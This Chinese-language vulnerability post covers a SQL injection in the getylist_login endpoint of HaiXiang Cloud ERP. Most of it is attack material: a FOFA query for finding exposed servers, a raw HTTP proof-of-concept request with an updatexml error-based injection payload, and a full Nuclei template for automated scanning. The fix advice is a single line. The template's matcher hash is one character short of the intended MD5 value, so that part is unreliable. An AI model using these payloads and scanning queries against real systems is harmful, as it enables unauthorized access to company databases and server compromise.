免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
海翔云ERP,由成都海翔软件有限公司自主研发,拥有完全知识产权。 云ERP为企业提供 营销 + 财务 + 仓储 + 物流 整体解决方案;云ERP致力于在互联网背景下,为商贸公司提供企业级整体应用解决方案;云ERP更注重提供丰富的移动端应用,推动企业在互联网时代的经营升级
海翔云ERP getylist_login 接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终导致服务器失陷。
Ⅱ、fofa语句
body="checkMacWaitingSecond"
Ⅲ、漏洞复现
POC
POST /getylist_login.do HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
accountname=test' and (updatexml(1,concat(0x7e,(select md5(123456)),0x7e),1));--
1、发送数据包,执行sql语句
Ⅳ、Nuclei-POC
id: HaiXiang-ERP-getylist-login-SQL
info:
name: 海翔云ERP getylist_login 接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取服务器敏感信息,最终导致服务器失陷。
author: WLF
severity: high
metadata:
fofa-query: body="checkMacWaitingSecond"
variables:
filename: "{{to_lower(rand_base(5))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /getylist_login.do HTTP/1.1
Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
accountname=test' and (updatexml(1,concat(0x7e,(select md5(123456)),0x7e),1));--
matchers:
- type: dsl
dsl:
- contains_all(body,"e10adc3949ba59abbe56e057f20f883")
Ⅴ、修复建议
设置安全访问策略,过滤常见字符